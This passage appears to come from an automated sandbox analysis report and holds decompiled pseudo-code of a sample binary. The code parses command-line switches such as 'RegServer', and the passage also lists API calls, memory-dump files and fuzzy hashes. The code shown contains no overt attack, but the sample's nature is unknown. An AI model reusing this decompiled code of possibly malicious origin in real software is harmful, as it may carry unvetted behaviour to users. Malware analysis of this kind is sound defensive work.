                                                                                                                                                                                                                                              																_t199 = _v265;
                                                                                                                                                                                                                                              																if(_t199 != 0) {
                                                                                                                                                                                                                                              																	_t219 =  &_v265;
                                                                                                                                                                                                                                              																	do {
                                                                                                                                                                                                                                              																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                              																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                              																		if(_t115 == 0) {
                                                                                                                                                                                                                                              																			 *0x1a8a2c = 1;
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			_t200 = 2;
                                                                                                                                                                                                                                              																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                              																			if(_t119 == 0) {
                                                                                                                                                                                                                                              																				 *0x1a8a30 = 1;
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                              																					 *0x1a8a34 = 1;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t209 = 0;
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																		_t118 =  *_t219;
                                                                                                                                                                                                                                              																		_t199 = _t118;
                                                                                                                                                                                                                                              																	} while (_t118 != 0);
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															 *0x1a8a2c = 1;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														goto L50;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t127 = _t111 - 3;
                                                                                                                                                                                                                                              														if(_t127 == 0) {
                                                                                                                                                                                                                                              															if(_v266 != 0) {
                                                                                                                                                                                                                                              																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																	goto L49;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                              																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                              																		goto L76;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                              																			goto L83;
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                              																				goto L76;
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				goto L49;
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																L76:
                                                                                                                                                                                                                                              																_push(2);
                                                                                                                                                                                                                                              																_pop(1);
                                                                                                                                                                                                                                              																L83:
                                                                                                                                                                                                                                              																 *0x1a8a38 = 1;
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              															goto L50;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t132 = _t127 - 1;
                                                                                                                                                                                                                                              															if(_t132 == 0) {
                                                                                                                                                                                                                                              																if(_v266 != 0) {
                                                                                                                                                                                                                                              																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                              																			goto L49;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t201 = _v265;
                                                                                                                                                                                                                                              																		 *0x1a9a2c = 1;
                                                                                                                                                                                                                                              																		if(_t201 != 0) {
                                                                                                                                                                                                                                              																			_t220 =  &_v265;
                                                                                                                                                                                                                                              																			do {
                                                                                                                                                                                                                                              																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                              																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                              																				if(_t142 == 0) {
                                                                                                                                                                                                                                              																					_t143 = 2;
                                                                                                                                                                                                                                              																					 *0x1a9a2c =  *0x1a9a2c | _t143;
                                                                                                                                                                                                                                              																					goto L70;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                              																					if(_t145 == 0) {
                                                                                                                                                                                                                                              																						 *0x1a8d48 =  *0x1a8d48 | 0x00000040;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                              																						if(_t146 == 0) {
                                                                                                                                                                                                                                              																							 *0x1a9a2c =  *0x1a9a2c & 0xfffffffd;
                                                                                                                                                                                                                                              																							goto L70;
                                                                                                                                                                                                                                              																						} else {
                                                                                                                                                                                                                                              																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                              																							if(_t147 == 0) {
                                                                                                                                                                                                                                              																								 *0x1a9a2c =  *0x1a9a2c & 0xfffffffe;
                                                                                                                                                                                                                                              																								goto L70;
                                                                                                                                                                                                                                              																							} else {
                                                                                                                                                                                                                                              																								_t149 = _t147;
                                                                                                                                                                                                                                              																								if(_t149 == 0) {
                                                                                                                                                                                                                                              																									 *0x1a8d48 =  *0x1a8d48 | 0x00000080;
                                                                                                                                                                                                                                              																								} else {
                                                                                                                                                                                                                                              																									if(_t149 == 3) {
                                                                                                                                                                                                                                              																										 *0x1a9a2c =  *0x1a9a2c | 0x00000004;
                                                                                                                                                                                                                                              																										L70:
                                                                                                                                                                                                                                              																										 *0x1a8a28 = 1;
                                                                                                                                                                                                                                              																									} else {
                                                                                                                                                                                                                                              																										_t209 = 0;
                                                                                                                                                                                                                                              																									}
                                                                                                                                                                                                                                              																								}
                                                                                                                                                                                                                                              																							}
                                                                                                                                                                                                                                              																						}
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t144 =  *_t220;
                                                                                                                                                                                                                                              																				_t201 = _t144;
                                                                                                                                                                                                                                              																			} while (_t144 != 0);
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	 *0x1a9a2c = 3;
                                                                                                                                                                                                                                              																	 *0x1a8a28 = 1;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              																goto L50;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																if(_t132 == 0) {
                                                                                                                                                                                                                                              																	goto L98;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	L49:
                                                                                                                                                                                                                                              																	_t209 = 0;
                                                                                                                                                                                                                                              																	L50:
                                                                                                                                                                                                                                              																	_t173 = _v272;
                                                                                                                                                                                                                                              																	if( *_t173 != 0) {
                                                                                                                                                                                                                                              																		goto L2;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		break;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L106;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										L34:
                                                                                                                                                                                                                                              										_t209 = 0;
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L131;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *0x1a8a2c != 0 &&  *0x1a8b3e == 0) {
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0x1a9a3c, 0x1a8b3e, 0x104) == 0) {
                                                                                                                                                                                                                                              							_t209 = 0;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t202 = 0x5c;
                                                                                                                                                                                                                                              							 *((char*)(E001A66C8(0x1a8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = _t209;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L131:
                                                                                                                                                                                                                                              			}


































































                                                                                                                                                                                                                                              0x001a5c9e
                                                                                                                                                                                                                                              0x001a5ca9
                                                                                                                                                                                                                                              0x001a5cb0
                                                                                                                                                                                                                                              0x001a5cb3
                                                                                                                                                                                                                                              0x001a5cb6
                                                                                                                                                                                                                                              0x001a5cb7
                                                                                                                                                                                                                                              0x001a5cb8
                                                                                                                                                                                                                                              0x001a5cbd
                                                                                                                                                                                                                                              0x001a6204
                                                                                                                                                                                                                                              0x001a5ccb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5ccb
                                                                                                                                                                                                                                              0x001a5cd3
                                                                                                                                                                                                                                              0x001a5cd7
                                                                                                                                                                                                                                              0x001a5cf4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5cf4
                                                                                                                                                                                                                                              0x001a5cf8
                                                                                                                                                                                                                                              0x001a5d00
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d06
                                                                                                                                                                                                                                              0x001a5d06
                                                                                                                                                                                                                                              0x001a5d0e
                                                                                                                                                                                                                                              0x001a5d10
                                                                                                                                                                                                                                              0x001a5d12
                                                                                                                                                                                                                                              0x001a5d14
                                                                                                                                                                                                                                              0x001a5d15
                                                                                                                                                                                                                                              0x001a5d17
                                                                                                                                                                                                                                              0x001a5d49
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d19
                                                                                                                                                                                                                                              0x001a5d19
                                                                                                                                                                                                                                              0x001a5d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d3f
                                                                                                                                                                                                                                              0x001a5d3f
                                                                                                                                                                                                                                              0x001a5d4b
                                                                                                                                                                                                                                              0x001a5d4b
                                                                                                                                                                                                                                              0x001a5d4f
                                                                                                                                                                                                                                              0x001a5d8d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d93
                                                                                                                                                                                                                                              0x001a5d93
                                                                                                                                                                                                                                              0x001a5d9a
                                                                                                                                                                                                                                              0x001a5d9d
                                                                                                                                                                                                                                              0x001a5d9e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d9e
                                                                                                                                                                                                                                              0x001a5d51
                                                                                                                                                                                                                                              0x001a5d5b
                                                                                                                                                                                                                                              0x001a5d72
                                                                                                                                                                                                                                              0x001a60fb
                                                                                                                                                                                                                                              0x001a60fb
                                                                                                                                                                                                                                              0x001a6207
                                                                                                                                                                                                                                              0x001a620a
                                                                                                                                                                                                                                              0x001a620b
                                                                                                                                                                                                                                              0x001a620e
                                                                                                                                                                                                                                              0x001a6217
                                                                                                                                                                                                                                              0x001a5d78
                                                                                                                                                                                                                                              0x001a5d78
                                                                                                                                                                                                                                              0x001a5d80
                                                                                                                                                                                                                                              0x001a5d83
                                                                                                                                                                                                                                              0x001a5d84
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d84
                                                                                                                                                                                                                                              0x001a5d5d
                                                                                                                                                                                                                                              0x001a5d5f
                                                                                                                                                                                                                                              0x001a5d62
                                                                                                                                                                                                                                              0x001a5d68
                                                                                                                                                                                                                                              0x001a5d64
                                                                                                                                                                                                                                              0x001a5d64
                                                                                                                                                                                                                                              0x001a5d64
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d62
                                                                                                                                                                                                                                              0x001a5d5b
                                                                                                                                                                                                                                              0x001a5d4f
                                                                                                                                                                                                                                              0x001a5d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d9f
                                                                                                                                                                                                                                              0x001a5d9f
                                                                                                                                                                                                                                              0x001a5da5
                                                                                                                                                                                                                                              0x001a5dab
                                                                                                                                                                                                                                              0x001a5dba
                                                                                                                                                                                                                                              0x001a6218
                                                                                                                                                                                                                                              0x001a621d
                                                                                                                                                                                                                                              0x001a6220
                                                                                                                                                                                                                                              0x001a6221
                                                                                                                                                                                                                                              0x001a6229
                                                                                                                                                                                                                                              0x001a6230
                                                                                                                                                                                                                                              0x001a6247
                                                                                                                                                                                                                                              0x001a626a
                                                                                                                                                                                                                                              0x001a6272
                                                                                                                                                                                                                                              0x001a6249
                                                                                                                                                                                                                                              0x001a6255
                                                                                                                                                                                                                                              0x001a625f
                                                                                                                                                                                                                                              0x001a6264
                                                                                                                                                                                                                                              0x001a6264
                                                                                                                                                                                                                                              0x001a6284
                                                                                                                                                                                                                                              0x001a5dc0
                                                                                                                                                                                                                                              0x001a5dc0
                                                                                                                                                                                                                                              0x001a5dca
                                                                                                                                                                                                                                              0x001a5e22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5dcc
                                                                                                                                                                                                                                              0x001a5dce
                                                                                                                                                                                                                                              0x001a5e24
                                                                                                                                                                                                                                              0x001a5e24
                                                                                                                                                                                                                                              0x001a5e2c
                                                                                                                                                                                                                                              0x001a5e47
                                                                                                                                                                                                                                              0x001a5e4a
                                                                                                                                                                                                                                              0x001a61d2
                                                                                                                                                                                                                                              0x001a61e2
                                                                                                                                                                                                                                              0x001a61e7
                                                                                                                                                                                                                                              0x001a61ee
                                                                                                                                                                                                                                              0x001a61f1
                                                                                                                                                                                                                                              0x001a61f1
                                                                                                                                                                                                                                              0x001a61f8
                                                                                                                                                                                                                                              0x001a61f8
                                                                                                                                                                                                                                              0x001a5e50
                                                                                                                                                                                                                                              0x001a5e53
                                                                                                                                                                                                                                              0x001a6109
                                                                                                                                                                                                                                              0x001a611f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6125
                                                                                                                                                                                                                                              0x001a6137
                                                                                                                                                                                                                                              0x001a613a
                                                                                                                                                                                                                                              0x001a613c
                                                                                                                                                                                                                                              0x001a613e
                                                                                                                                                                                                                                              0x001a613e
                                                                                                                                                                                                                                              0x001a6141
                                                                                                                                                                                                                                              0x001a6141
                                                                                                                                                                                                                                              0x001a6143
                                                                                                                                                                                                                                              0x001a6144
                                                                                                                                                                                                                                              0x001a614a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6150
                                                                                                                                                                                                                                              0x001a6152
                                                                                                                                                                                                                                              0x001a615c
                                                                                                                                                                                                                                              0x001a6170
                                                                                                                                                                                                                                              0x001a6172
                                                                                                                                                                                                                                              0x001a617c
                                                                                                                                                                                                                                              0x001a6190
                                                                                                                                                                                                                                              0x001a6190
                                                                                                                                                                                                                                              0x001a6196
                                                                                                                                                                                                                                              0x001a61a5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a61ab
                                                                                                                                                                                                                                              0x001a61b9
                                                                                                                                                                                                                                              0x001a61c6
                                                                                                                                                                                                                                              0x001a61c6
                                                                                                                                                                                                                                              0x001a617e
                                                                                                                                                                                                                                              0x001a6180
                                                                                                                                                                                                                                              0x001a618a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a618a
                                                                                                                                                                                                                                              0x001a615e
                                                                                                                                                                                                                                              0x001a6160
                                                                                                                                                                                                                                              0x001a616a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a616a
                                                                                                                                                                                                                                              0x001a615c
                                                                                                                                                                                                                                              0x001a614a
                                                                                                                                                                                                                                              0x001a610b
                                                                                                                                                                                                                                              0x001a610e
                                                                                                                                                                                                                                              0x001a610e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e59
                                                                                                                                                                                                                                              0x001a5e59
                                                                                                                                                                                                                                              0x001a5e5c
                                                                                                                                                                                                                                              0x001a604f
                                                                                                                                                                                                                                              0x001a6056
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a605c
                                                                                                                                                                                                                                              0x001a606e
                                                                                                                                                                                                                                              0x001a6071
                                                                                                                                                                                                                                              0x001a6073
                                                                                                                                                                                                                                              0x001a6075
                                                                                                                                                                                                                                              0x001a6075
                                                                                                                                                                                                                                              0x001a6078
                                                                                                                                                                                                                                              0x001a6078
                                                                                                                                                                                                                                              0x001a607a
                                                                                                                                                                                                                                              0x001a607b
                                                                                                                                                                                                                                              0x001a6081
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6087
                                                                                                                                                                                                                                              0x001a6087
                                                                                                                                                                                                                                              0x001a608d
                                                                                                                                                                                                                                              0x001a609c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a60a2
                                                                                                                                                                                                                                              0x001a60aa
                                                                                                                                                                                                                                              0x001a60b2
                                                                                                                                                                                                                                              0x001a60b7
                                                                                                                                                                                                                                              0x001a60bd
                                                                                                                                                                                                                                              0x001a60bf
                                                                                                                                                                                                                                              0x001a60bf
                                                                                                                                                                                                                                              0x001a60d6
                                                                                                                                                                                                                                              0x001a60e0
                                                                                                                                                                                                                                              0x001a60e7
                                                                                                                                                                                                                                              0x001a60f5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a60f5
                                                                                                                                                                                                                                              0x001a609c
                                                                                                                                                                                                                                              0x001a6081
                                                                                                                                                                                                                                              0x001a5e62
                                                                                                                                                                                                                                              0x001a5e62
                                                                                                                                                                                                                                              0x001a5e65
                                                                                                                                                                                                                                              0x001a5fd3
                                                                                                                                                                                                                                              0x001a5fe9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5fef
                                                                                                                                                                                                                                              0x001a5fef
                                                                                                                                                                                                                                              0x001a5ff7
                                                                                                                                                                                                                                              0x001a5ffd
                                                                                                                                                                                                                                              0x001a6003
                                                                                                                                                                                                                                              0x001a6006
                                                                                                                                                                                                                                              0x001a6011
                                                                                                                                                                                                                                              0x001a6014
                                                                                                                                                                                                                                              0x001a603d
                                                                                                                                                                                                                                              0x001a6016
                                                                                                                                                                                                                                              0x001a6018
                                                                                                                                                                                                                                              0x001a6019
                                                                                                                                                                                                                                              0x001a601b
                                                                                                                                                                                                                                              0x001a6033
                                                                                                                                                                                                                                              0x001a601d
                                                                                                                                                                                                                                              0x001a6020
                                                                                                                                                                                                                                              0x001a6029
                                                                                                                                                                                                                                              0x001a6022
                                                                                                                                                                                                                                              0x001a6022
                                                                                                                                                                                                                                              0x001a6022
                                                                                                                                                                                                                                              0x001a6020
                                                                                                                                                                                                                                              0x001a601b
                                                                                                                                                                                                                                              0x001a6042
                                                                                                                                                                                                                                              0x001a6044
                                                                                                                                                                                                                                              0x001a6046
                                                                                                                                                                                                                                              0x001a604a
                                                                                                                                                                                                                                              0x001a5ff7
                                                                                                                                                                                                                                              0x001a5fd5
                                                                                                                                                                                                                                              0x001a5fd8
                                                                                                                                                                                                                                              0x001a5fd8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e6b
                                                                                                                                                                                                                                              0x001a5e6b
                                                                                                                                                                                                                                              0x001a5e6e
                                                                                                                                                                                                                                              0x001a5f8b
                                                                                                                                                                                                                                              0x001a5f99
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5f9f
                                                                                                                                                                                                                                              0x001a5fa7
                                                                                                                                                                                                                                              0x001a5faf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5fb1
                                                                                                                                                                                                                                              0x001a5fb3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5fb5
                                                                                                                                                                                                                                              0x001a5fb7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5fb9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5fb9
                                                                                                                                                                                                                                              0x001a5fb7
                                                                                                                                                                                                                                              0x001a5fb3
                                                                                                                                                                                                                                              0x001a5faf
                                                                                                                                                                                                                                              0x001a5f8d
                                                                                                                                                                                                                                              0x001a5f8d
                                                                                                                                                                                                                                              0x001a5f8d
                                                                                                                                                                                                                                              0x001a5f8f
                                                                                                                                                                                                                                              0x001a5fc1
                                                                                                                                                                                                                                              0x001a5fc1
                                                                                                                                                                                                                                              0x001a5fc1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e74
                                                                                                                                                                                                                                              0x001a5e74
                                                                                                                                                                                                                                              0x001a5e77
                                                                                                                                                                                                                                              0x001a5ea0
                                                                                                                                                                                                                                              0x001a5ebd
                                                                                                                                                                                                                                              0x001a5f79
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5f7f
                                                                                                                                                                                                                                              0x001a5ec3
                                                                                                                                                                                                                                              0x001a5ec3
                                                                                                                                                                                                                                              0x001a5ecc
                                                                                                                                                                                                                                              0x001a5ed4
                                                                                                                                                                                                                                              0x001a5ed6
                                                                                                                                                                                                                                              0x001a5edc
                                                                                                                                                                                                                                              0x001a5edf
                                                                                                                                                                                                                                              0x001a5eea
                                                                                                                                                                                                                                              0x001a5eed
                                                                                                                                                                                                                                              0x001a5f3f
                                                                                                                                                                                                                                              0x001a5f40
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5eef
                                                                                                                                                                                                                                              0x001a5eef
                                                                                                                                                                                                                                              0x001a5ef2
                                                                                                                                                                                                                                              0x001a5f34
                                                                                                                                                                                                                                              0x001a5ef4
                                                                                                                                                                                                                                              0x001a5ef4
                                                                                                                                                                                                                                              0x001a5ef7
                                                                                                                                                                                                                                              0x001a5f2b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5ef9
                                                                                                                                                                                                                                              0x001a5ef9
                                                                                                                                                                                                                                              0x001a5efc
                                                                                                                                                                                                                                              0x001a5f22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5efe
                                                                                                                                                                                                                                              0x001a5eff
                                                                                                                                                                                                                                              0x001a5f02
                                                                                                                                                                                                                                              0x001a5f16
                                                                                                                                                                                                                                              0x001a5f04
                                                                                                                                                                                                                                              0x001a5f07
                                                                                                                                                                                                                                              0x001a5f0d
                                                                                                                                                                                                                                              0x001a5f46
                                                                                                                                                                                                                                              0x001a5f46
                                                                                                                                                                                                                                              0x001a5f09
                                                                                                                                                                                                                                              0x001a5f09
                                                                                                                                                                                                                                              0x001a5f09
                                                                                                                                                                                                                                              0x001a5f07
                                                                                                                                                                                                                                              0x001a5f02
                                                                                                                                                                                                                                              0x001a5efc
                                                                                                                                                                                                                                              0x001a5ef7
                                                                                                                                                                                                                                              0x001a5ef2
                                                                                                                                                                                                                                              0x001a5f4c
                                                                                                                                                                                                                                              0x001a5f4e
                                                                                                                                                                                                                                              0x001a5f50
                                                                                                                                                                                                                                              0x001a5f54
                                                                                                                                                                                                                                              0x001a5ed4
                                                                                                                                                                                                                                              0x001a5ea2
                                                                                                                                                                                                                                              0x001a5ea4
                                                                                                                                                                                                                                              0x001a5eaf
                                                                                                                                                                                                                                              0x001a5eaf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e79
                                                                                                                                                                                                                                              0x001a5e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e83
                                                                                                                                                                                                                                              0x001a5e83
                                                                                                                                                                                                                                              0x001a5e83
                                                                                                                                                                                                                                              0x001a5e85
                                                                                                                                                                                                                                              0x001a5e85
                                                                                                                                                                                                                                              0x001a5e8e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e94
                                                                                                                                                                                                                                              0x001a5e8e
                                                                                                                                                                                                                                              0x001a5e7d
                                                                                                                                                                                                                                              0x001a5e77
                                                                                                                                                                                                                                              0x001a5e6e
                                                                                                                                                                                                                                              0x001a5e65
                                                                                                                                                                                                                                              0x001a5e5c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5dd0
                                                                                                                                                                                                                                              0x001a5dd0
                                                                                                                                                                                                                                              0x001a5dd0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5dd0
                                                                                                                                                                                                                                              0x001a5dce
                                                                                                                                                                                                                                              0x001a5dca
                                                                                                                                                                                                                                              0x001a5dba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d00
                                                                                                                                                                                                                                              0x001a5dd9
                                                                                                                                                                                                                                              0x001a5e04
                                                                                                                                                                                                                                              0x001a61fe
                                                                                                                                                                                                                                              0x001a5e0a
                                                                                                                                                                                                                                              0x001a5e0c
                                                                                                                                                                                                                                              0x001a5e17
                                                                                                                                                                                                                                              0x001a5e17
                                                                                                                                                                                                                                              0x001a5e04
                                                                                                                                                                                                                                              0x001a6200
                                                                                                                                                                                                                                              0x001a6200
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharNextA.USER32(?,00000000,?,?), ref: 001A5CEE
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(001A8B3E,00000104,00000000,?,?), ref: 001A5DFC
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 001A5E3E
                                                                                                                                                                                                                                              • CharUpperA.USER32(-00000052), ref: 001A5EE1
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 001A5F6F
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 001A5FA7
                                                                                                                                                                                                                                              • CharUpperA.USER32(-0000004E), ref: 001A6008
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 001A60AA
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,001A1140,00000000,00000040,00000000), ref: 001A61F1
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 001A61F8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                              • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                              • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                              • Opcode ID: 19f5f2cb2990a38cd7841eca4a9dc75db04f41b3d2894aee30459b26f6a27996
                                                                                                                                                                                                                                              • Instruction ID: 5c7ee686f8f16422b5187510ab481d4e4dfefebee93a1372ce735d48447aa0d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19f5f2cb2990a38cd7841eca4a9dc75db04f41b3d2894aee30459b26f6a27996
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98D16D7DA0CA545EDF368B388C487FA7B67AB27310F1800AAD496D7595DB708EC6CB40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                                                                                              			E001A1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				int _t28;
                                                                                                                                                                                                                                              				signed char _t30;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t41 = __esi;
